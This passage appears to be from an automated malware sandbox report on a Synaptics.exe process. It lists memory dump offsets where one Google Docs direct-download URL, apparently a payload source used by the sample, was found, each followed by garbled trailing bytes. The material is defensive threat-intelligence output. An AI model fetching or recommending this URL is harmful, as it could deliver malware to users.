                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifo
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmV7&A
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmYK$c
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmerce
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmm
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmrw%
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmww
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                            Source: Synaptics.exe, 00000007.00000002.1745653784.000000000542A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.comD
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.comS
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.net
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnZ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnamaV
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell9
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndica
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndro
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cne
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne6%
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnectic
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyorx
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntrolOfs0040000000001EEC
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.co
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoM
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleg1
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoglet
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoj
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadojecq
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvi
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...)
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorig
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi/Y
                            Source: Synaptics.exe, 00000007.00000002.1745653784.000000000542A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoutubekids.comfligyt.be
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpe
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq:
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqq
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq~
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrY
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrce.
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrl.go
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojecb
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsion
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads;
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadservi
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsluAtV
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt2.com
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt6
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtZ
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtacom
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp3~
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduR
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduS
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduW?
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadup
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurity
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduu
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv%K
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv5
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvk
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw3
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwP1$
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwnloao
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2330589183.0000000018AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276507367.000000000D5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2316324534.0000000013EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2322602146.0000000015F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2305799683.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady6
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyS
